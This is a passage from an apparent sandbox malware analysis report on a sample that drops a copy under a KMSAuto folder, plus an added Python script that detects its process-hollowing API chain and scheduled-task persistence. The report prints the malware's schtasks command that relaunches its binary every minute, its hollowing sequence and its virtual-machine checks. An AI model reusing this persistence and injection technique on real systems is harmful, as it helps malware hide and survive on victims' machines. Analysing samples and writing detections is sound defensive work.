            Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: nobtpajdjthawd.exe, 00000001.00000002.1310912269.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3626533610.00000000016EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
            Source: Amcache.hve.4.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.4.dr Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.dr Binary or memory string: VMware20,1
            Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.dr Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.4.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.dr Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.dr Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual RAM
            Source: nobtpajdjthawd.exe, 00000001.00000002.1310912269.00000000011A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}z
            Source: Amcache.hve.4.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.4.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Process queried: DebugPort (2 occurrences)
            Source: C:\ProgramData\KMSAuto\accc.exe Process queried: DebugPort (4 occurrences)
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Code function: 0_2_031E2169 mov edi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Code function: 0_2_031E22E6 mov edi, dword ptr fs:[00000030h]
            Source: C:\ProgramData\KMSAuto\accc.exe Code function: 14_2_024421C5 mov edi, dword ptr fs:[00000030h]
            Source: C:\ProgramData\KMSAuto\accc.exe Code function: 14_2_02442342 mov edi, dword ptr fs:[00000030h]
            Source: C:\ProgramData\KMSAuto\accc.exe Code function: 15_2_02992431 mov edi, dword ptr fs:[00000030h]
            Source: C:\ProgramData\KMSAuto\accc.exe Code function: 15_2_029925AE mov edi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Code function: 0_2_031E2169 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Memory written: C:\Users\user\Desktop\nobtpajdjthawd.exe base: 400000 value starts with: 4D5A
            Source: C:\ProgramData\KMSAuto\accc.exe Memory written: C:\ProgramData\KMSAuto\accc.exe base: 400000 value starts with: 4D5A (2 occurrences)
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Process created: C:\Users\user\Desktop\nobtpajdjthawd.exe "C:\Users\user\Desktop\nobtpajdjthawd.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 12:56 /du 23:59 /sc daily /ri 1 /f
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat""
            Source: C:\ProgramData\KMSAuto\accc.exe Process created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe" (2 occurrences)
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 7
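            The two findings in this section that a responder will want to turn into detection logic are the RunPE-style API chain in function 0_2_031E2169 (create a process, read its thread context, allocate and write into it, set the context, resume) and the scheduled task that re-launches C:\ProgramData\KMSAuto\accc.exe every minute. The Python below is an added example and is not part of the Joe Sandbox report or of the sample's code: it takes the API sequence and the schtasks command line exactly as copied from the lines above (constructed inputs) and shows how a triage script can recognise both. The stage table, the USER_WRITABLE path list and every function name are this example's own assumptions.

```python
"""Triage helpers for two behaviours reported above: the process-hollowing
API chain of function 0_2_031E2169 and the schtasks persistence command.
Added example; the two REPORTED_* inputs are copied from the report lines,
everything else (stage table, path list, function names) is an assumption."""
import re

# Constructed input: the API sequence from the "Code function: 0_2_031E2169"
# line, in the order the sandbox listed it.
REPORTED_CHAIN = (
    ["GetProcAddress"] * 8
    + ["CreateProcessW"] * 2
    + ["VirtualAlloc"] * 2
    + ["GetThreadContext", "Wow64GetThreadContext"]
    + ["ReadProcessMemory"] * 2
    + ["VirtualAllocEx"] * 2
    + ["GetProcAddress"]
    + ["WriteProcessMemory"] * 6
    + ["SetThreadContext", "Wow64SetThreadContext"]
    + ["ResumeThread"] * 2
)

# Ordered stages of classic process hollowing (assumed table).  Each stage is
# satisfied by any API in its set; the Wow64* variants are what a 32-bit
# injector calls on a 64-bit host.  Whether CreateProcess passed
# CREATE_SUSPENDED is not visible from the name alone, so stage 1 is a heuristic.
HOLLOWING_STAGES = [
    ("create target process", {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"}),
    ("read target thread context", {"GetThreadContext", "Wow64GetThreadContext"}),
    ("allocate in target", {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write payload into target", {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("redirect entry point", {"SetThreadContext", "Wow64SetThreadContext"}),
    ("resume target", {"ResumeThread", "NtResumeThread"}),
]


def hollowing_stages(calls):
    """Walk the call list once, in order, and return the names of the stages
    reached before the pattern broke.  All six means a complete chain."""
    reached = []
    pos = 0
    for name, apis in HOLLOWING_STAGES:
        while pos < len(calls) and calls[pos] not in apis:
            pos += 1
        if pos == len(calls):
            break
        reached.append(name)
        pos += 1
    return reached


def is_process_hollowing(calls):
    return len(hollowing_stages(calls)) == len(HOLLOWING_STAGES)


# Constructed input: the command line from the "Process created:
# C:\Windows\SysWOW64\schtasks.exe" line above.
REPORTED_SCHTASKS = (
    '"schtasks.exe" /create /tn Tools /tr "C:\\ProgramData\\KMSAuto\\accc.exe" '
    "/st 12:56 /du 23:59 /sc daily /ri 1 /f"
)

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

# Locations a standard user can write to without elevation (assumed list).
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "\\appdata\\", "\\temp\\")


def parse_schtasks(cmdline):
    """Split a schtasks command line into (program, {switch: value}).
    Switch names are lower-cased; a bare switch such as /f maps to True."""
    tokens = [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]
    program, rest = tokens[0], tokens[1:]
    fields = {}
    i = 0
    while i < len(rest):
        tok = rest[i]
        if not tok.startswith("/"):
            i += 1
            continue
        key = tok[1:].lower()
        if i + 1 < len(rest) and not rest[i + 1].startswith("/"):
            fields[key] = rest[i + 1]
            i += 2
        else:
            fields[key] = True
            i += 1
    return program, fields


def assess_schtasks(cmdline):
    """Return the reasons a schtasks /create command looks like malware
    persistence (empty list if nothing stands out)."""
    _, f = parse_schtasks(cmdline)
    reasons = []
    if "create" not in f:
        return reasons
    target = str(f.get("tr", "")).lower()
    if any(marker in target for marker in USER_WRITABLE):
        reasons.append(f"task action runs from a user-writable path: {f['tr']}")
    ri = f.get("ri")
    if isinstance(ri, str) and ri.isdigit() and int(ri) <= 5:
        reasons.append(f"repeats every {ri} minute(s) (/ri {ri})")
    if str(f.get("sc", "")).lower() == "daily" and "du" in f and ri:
        reasons.append(f"/sc daily with /du {f['du']} and /ri {ri} keeps the binary running all day")
    if f.get("f") is True:
        reasons.append("/f overwrites any existing task of the same name without a prompt")
    return reasons


if __name__ == "__main__":
    print(hollowing_stages(REPORTED_CHAIN))
    for reason in assess_schtasks(REPORTED_SCHTASKS):
        print("-", reason)
```

            The stage walker checks order only, not that CreateProcessW was called with CREATE_SUSPENDED, so a full match is a strong indicator to correlate with the "Memory written ... base: 400000 value starts with: 4D5A" lines (an MZ header written at the target's image base) rather than proof on its own. For the task, the combination of /sc daily, /du 23:59 and /ri 1 is the tell: it is a one-minute watchdog dressed up as a daily job, and /tn Tools plus the KMSAuto directory name are chosen to look like a cracking tool's leftovers.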

            Language, Device and Operating System Detection

            Source: Yara match File source: 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.1364848533.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000014.00000002.1364848533.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: nobtpajdjthawd.exe PID: 7324, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: accc.exe PID: 1228, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: accc.exe PID: 7188, type: MEMORYSTR
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Queries volume information: C:\Users\user\Desktop\nobtpajdjthawd.exe VolumeInformation
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Queries volume information: C:\Users\user\Desktop\nobtpajdjthawd.exe VolumeInformation
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation (2 occurrences)
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation (10 occurrences)
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation (3 occurrences)
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation (2 occurrences)
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation (2 occurrences)
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation (2 occurrences)
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation (2 occurrences)
            Source: C:\ProgramData\KMSAuto\accc.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
